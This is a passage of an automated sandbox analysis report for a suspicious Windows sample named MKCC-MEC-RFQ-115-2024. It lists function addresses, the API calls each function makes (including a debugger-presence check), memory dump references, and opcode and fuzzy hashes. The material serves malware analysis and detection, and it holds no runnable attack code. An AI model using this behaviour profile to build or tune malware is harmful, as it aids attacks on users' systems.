                                              • _free.LIBCMT ref: 0014999E
                                                • Part of subcall function 00102F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00109C64), ref: 00102FA9
                                                • Part of subcall function 00102F95: GetLastError.KERNEL32(00000000,?,00109C64), ref: 00102FBB
                                              • _free.LIBCMT ref: 001499A6
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                              • String ID:
                                              • API String ID: 1552873950-0
                                              • Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                              • Instruction ID: 71f8995b05e9283aee9689bc0eb4915eed45981b84c388ea223e543d3d48b55f
                                              • Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                              • Instruction Fuzzy Hash: 44517FB1D04258AFDF249F65CC85A9EBBB9EF48304F0004AEF249A7291DB715E90CF58
                                              Function 0010493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                              • String ID:
                                              • API String ID: 2782032738-0
                                              • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                              • Instruction ID: ba2b3a29d61a40dc49bfb3cb66b7b7fd0a564fea2447d96b3e4d334c0c811845
                                              • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                              • Instruction Fuzzy Hash: 3541B4B0700606DBDB28CEA9C8C09AF77A5AF88364B24813DEAD6876D0D7F09D418744
                                              Function 000E73E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 0011EE62
                                              • GetOpenFileNameW.COMDLG32(?), ref: 0011EEAC
                                                • Part of subcall function 000E48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000E48A1,?,?,000E37C0,?), ref: 000E48CE
                                                • Part of subcall function 001009D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001009F4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Name$Path$FileFullLongOpen_memset
                                              • String ID: X
                                              • API String ID: 3777226403-3081909835
                                              • Opcode ID: 531fdade64ec30596c0d7d7cdcea0e03c2ca2399038e4146bbca71ae0faa7088
                                              • Instruction ID: c0e6d5c4ac03974eeab9779140feb4ae487a53f898dc05935a5acf93eb511c82
                                              • Opcode Fuzzy Hash: 531fdade64ec30596c0d7d7cdcea0e03c2ca2399038e4146bbca71ae0faa7088
                                              • Instruction Fuzzy Hash: 4521A171A042989FDF159F98C845BEEBBF99F49300F00405AF408F7282DBB459898BA1
                                              Function 0014901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: __fread_nolock_memmove
                                              • String ID: EA06
                                              • API String ID: 1988441806-3962188686
                                              • Opcode ID: 048f6233571fcb0fd67810730aa7568b93b20878558cc572cf6e55578d379169
                                              • Instruction ID: 39ceb3fa861b2f2d334bc6a019e92a6ea7af646cc1b9056dde5aad21ac39d375
                                              • Opcode Fuzzy Hash: 048f6233571fcb0fd67810730aa7568b93b20878558cc572cf6e55578d379169
                                              • Instruction Fuzzy Hash: 7101B971904258BEDB28C6A9C856EEE7BFC9B15311F00419BF592D21C1E6B5A6088BA0
                                              Function 00149B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetTempPathW.KERNEL32(00000104,?), ref: 00149B82
                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00149B99
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Temp$FileNamePath
                                              • String ID: aut
                                              • API String ID: 3285503233-3010740371
                                              • Opcode ID: 264d67e6bc42a002da3106cae65ba1da41e3ff4f3726054764a8784276a64c3b
                                              • Instruction ID: fa1fc46fecde44d32f27ab7e4e24ffb9b26398f69cc767832dc97535a3db67cd
                                              • Opcode Fuzzy Hash: 264d67e6bc42a002da3106cae65ba1da41e3ff4f3726054764a8784276a64c3b
                                              • Instruction Fuzzy Hash: ECD05E7954030DABDB109B90EC0EF9A773CEB04704F0042A5FE54920A1DEF095D98FD1
                                              Function 0015CDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d2392518cecf0c1b3c12280308e8d09ab67ef9f1ab33526aa430917db49ef892
                                              • Instruction ID: dde13bedbf3dc2d9cf1b338eeccd9128841c4feb39c32fafc89f92817ba8a988
                                              • Opcode Fuzzy Hash: d2392518cecf0c1b3c12280308e8d09ab67ef9f1ab33526aa430917db49ef892
                                              • Instruction Fuzzy Hash: F3F12770508341DFC724DF29C480A6ABBE5FF88314F54896DF8A99B252D771E946CF82
                                              Function 000EF8CF Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 001003A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 001003D3
                                                • Part of subcall function 001003A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 001003DB
                                                • Part of subcall function 001003A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 001003E6
                                                • Part of subcall function 001003A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 001003F1
                                                • Part of subcall function 001003A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 001003F9
                                                • Part of subcall function 001003A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00100401
                                                • Part of subcall function 000F6259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,000EFA90), ref: 000F62B4
                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 000EFB2D
                                              • OleInitialize.OLE32(00000000), ref: 000EFBAA
                                              • CloseHandle.KERNEL32(00000000), ref: 001249F2
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                              • String ID:
                                              • API String ID: 1986988660-0
                                              • Opcode ID: 600f71f460b01792b52d19400b32da5c259041b1eea8eefc43da2213723a3d7b
                                              • Instruction ID: a75fdccbe53bd44506c04fe51df2023352eee493dbf1599c5091aebe525478d6
                                              • Opcode Fuzzy Hash: 600f71f460b01792b52d19400b32da5c259041b1eea8eefc43da2213723a3d7b
                                              • Instruction Fuzzy Hash: 2D81BAB4918280CFCB84DF7AEE446657AF4FB5E318718813ED029D7AA2EB754486CF50
                                              Function 000E43DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 000E4401
                                              • Shell_NotifyIconW.SHELL32(00000000,?), ref: 000E44A6
                                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 000E44C3
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: IconNotifyShell_$_memset
                                              • String ID:
                                              • API String ID: 1505330794-0
                                              • Opcode ID: 4d11d97074ef9a3495e38dd0608e222fce2180546d160fc37f3d6f048eada43b
                                              • Instruction ID: 22586a4351d3b3f2e64c094184cf035ccfd0476d5c78c51bc68f5c927ab47f91
                                              • Opcode Fuzzy Hash: 4d11d97074ef9a3495e38dd0608e222fce2180546d160fc37f3d6f048eada43b
                                              • Instruction Fuzzy Hash: 6F31B4B06053418FD761DF35D884B9BBBF8FB49304F04092EF59A93691D7B1A984CB92
                                              Function 0010594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • __FF_MSGBANNER.LIBCMT ref: 00105963
                                                • Part of subcall function 0010A3AB: __NMSG_WRITE.LIBCMT ref: 0010A3D2
                                                • Part of subcall function 0010A3AB: __NMSG_WRITE.LIBCMT ref: 0010A3DC
                                              • __NMSG_WRITE.LIBCMT ref: 0010596A
                                                • Part of subcall function 0010A408: GetModuleFileNameW.KERNEL32(00000000,001A43BA,00000104,?,00000001,00000000), ref: 0010A49A
                                                • Part of subcall function 0010A408: ___crtMessageBoxW.LIBCMT ref: 0010A548
                                                • Part of subcall function 001032DF: ___crtCorExitProcess.LIBCMT ref: 001032E5
                                                • Part of subcall function 001032DF: ExitProcess.KERNEL32 ref: 001032EE
                                                • Part of subcall function 00108D68: __getptd_noexit.LIBCMT ref: 00108D68
                                              • RtlAllocateHeap.NTDLL(00F00000,00000000,00000001,00000000,?,?,?,00101013,?), ref: 0010598F
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                              • String ID:
                                              • API String ID: 1372826849-0
                                              • Opcode ID: 7ec19b64abeed47e58457d4be7f3a30babcddd471fd544b03970184ea68c9bf4
                                              • Instruction ID: bbabd83255d58af8d1462738cac9930dcf576b10dc8035894d91d108dcad8068
                                              • Opcode Fuzzy Hash: 7ec19b64abeed47e58457d4be7f3a30babcddd471fd544b03970184ea68c9bf4
                                              • Instruction Fuzzy Hash: C801DE31204B15DFE7253B64EC42B2F728A9FA2778F61012AF4C1AA1D1DBF09D418B60
                                              Function 00149B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,001497D2,?,?,?,?,?,00000004), ref: 00149B45
                                              • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,001497D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00149B5B
                                              • CloseHandle.KERNEL32(00000000,?,001497D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00149B62
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: File$CloseCreateHandleTime
                                              • String ID:
                                              • API String ID: 3397143404-0
                                              • Opcode ID: de86a1d9ac2fe01586e6df4fb2feccb5695447939924f458cd93af2edfe0b9c5
                                              • Instruction ID: 0bac3514b9d0da8c9a12f9fe7789197c67e8dd3733057b90f4be4df445fb298a
                                              • Opcode Fuzzy Hash: de86a1d9ac2fe01586e6df4fb2feccb5695447939924f458cd93af2edfe0b9c5
                                              • Instruction Fuzzy Hash: 72E08632181214B7D7212B54FC09FCA7B58EB067A1F104124FB54690E087F129529798
                                              Function 00148F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                              Download Yara Rule
                                              APIs
                                              • _free.LIBCMT ref: 00148FA5
                                                • Part of subcall function 00102F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00109C64), ref: 00102FA9
                                                • Part of subcall function 00102F95: GetLastError.KERNEL32(00000000,?,00109C64), ref: 00102FBB
                                              • _free.LIBCMT ref: 00148FB6
                                              • _free.LIBCMT ref: 00148FC8
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                              • Instruction ID: 91618f007ba12b11903e4818a79f673c6f6d17988b58ffa249beb6877450e2a4
                                              • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                              • Instruction Fuzzy Hash: 7FE05BB170D7024BCA24A578AD44E9757FE5F48390758081DF459DB1C2DF74FC458134
                                              Function 000EAB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: CALL
                                              • API String ID: 0-4196123274
                                              • Opcode ID: 154a23037d8a926a6912497885f8061d6ee19ecbc866c51859b3d5c516690a0e
                                              • Instruction ID: 6eaa1c0e6a05a471298fc0592b63735c5ff49061bafb0f18bd8bce470f257f31
                                              • Opcode Fuzzy Hash: 154a23037d8a926a6912497885f8061d6ee19ecbc866c51859b3d5c516690a0e
                                              • Instruction Fuzzy Hash: 0E225970608391DFC725DF15C490B6ABBE1BF89300F15896DE896AB362D731ED85CB82
                                              Function 000E4DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: _memmove
                                              • String ID: EA06
                                              • API String ID: 4104443479-3962188686
                                              • Opcode ID: 4d6f7f1d845349697502198bf7aa0a584effac3942286f75a6bffc1177d3d762
                                              • Instruction ID: 4aafdfb341addb6a363b5665e0f897198d712b9c44d70e3fc99e8a44e3c1f85c
                                              • Opcode Fuzzy Hash: 4d6f7f1d845349697502198bf7aa0a584effac3942286f75a6bffc1177d3d762
                                              • Instruction Fuzzy Hash: AE415972A041D46FCF259B668C927FE7FA6AB05300F684475F882BA383C6619D8483E1
                                              Function 000E492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                              Download Yara Rule
                                              APIs
                                              • IsThemeActive.UXTHEME ref: 000E4992
                                                • Part of subcall function 001035AC: __lock.LIBCMT ref: 001035B2
                                                • Part of subcall function 001035AC: DecodePointer.KERNEL32(00000001,?,000E49A7,001381BC), ref: 001035BE
                                                • Part of subcall function 001035AC: EncodePointer.KERNEL32(?,?,000E49A7,001381BC), ref: 001035C9
                                                • Part of subcall function 000E4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 000E4A73
                                                • Part of subcall function 000E4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 000E4A88
                                                • Part of subcall function 000E3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000E3B7A
                                                • Part of subcall function 000E3B4C: IsDebuggerPresent.KERNEL32 ref: 000E3B8C
                                                • Part of subcall function 000E3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,001A62F8,001A62E0,?,?), ref: 000E3BFD
                                                • Part of subcall function 000E3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 000E3C81
                                              • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 000E49D2
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                              • String ID:
                                              • API String ID: 1438897964-0
                                              • Opcode ID: 8106e86f9425d5c498ea02ed63df35ee209db4c2df627776a5100ee91f2727ed
                                              • Instruction ID: 11378d035524a18dbe8957560f93edfe73bf9a5d48a098b9fd7b3ee91e78487b
                                              • Opcode Fuzzy Hash: 8106e86f9425d5c498ea02ed63df35ee209db4c2df627776a5100ee91f2727ed
                                              • Instruction Fuzzy Hash: F2118C719083519FC300DF2AEC0594ABBE8EF99710F04452EF095972B2DBB09685CB92
                                              Function 000E5DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,000E5981,?,?,?,?), ref: 000E5E27
                                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,000E5981,?,?,?,?), ref: 0011E19C
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 7c762f5707595053bc06fef909a09f06b8dd11f53d17a00c0fc9d700e479e2e9
                                              • Instruction ID: 60a0a2b4c256ee5b05a71bff14ce8e3f89994d7bde02bb498fa53ac23828b5e0
                                              • Opcode Fuzzy Hash: 7c762f5707595053bc06fef909a09f06b8dd11f53d17a00c0fc9d700e479e2e9
                                              • Instruction Fuzzy Hash: 0701B971244748BEF7681E15DC86F6637DCEB0176DF108718FAE56A1E0C7B01D858B50
                                              Function 00100FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0010594C: __FF_MSGBANNER.LIBCMT ref: 00105963
                                                • Part of subcall function 0010594C: __NMSG_WRITE.LIBCMT ref: 0010596A
                                                • Part of subcall function 0010594C: RtlAllocateHeap.NTDLL(00F00000,00000000,00000001,00000000,?,?,?,00101013,?), ref: 0010598F
                                              • std::exception::exception.LIBCMT ref: 0010102C
                                              • __CxxThrowException@8.LIBCMT ref: 00101041
                                                • Part of subcall function 001087DB: RaiseException.KERNEL32(?,?,?,0019BAF8,00000000,?,?,?,?,00101046,?,0019BAF8,?,00000001), ref: 00108830
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
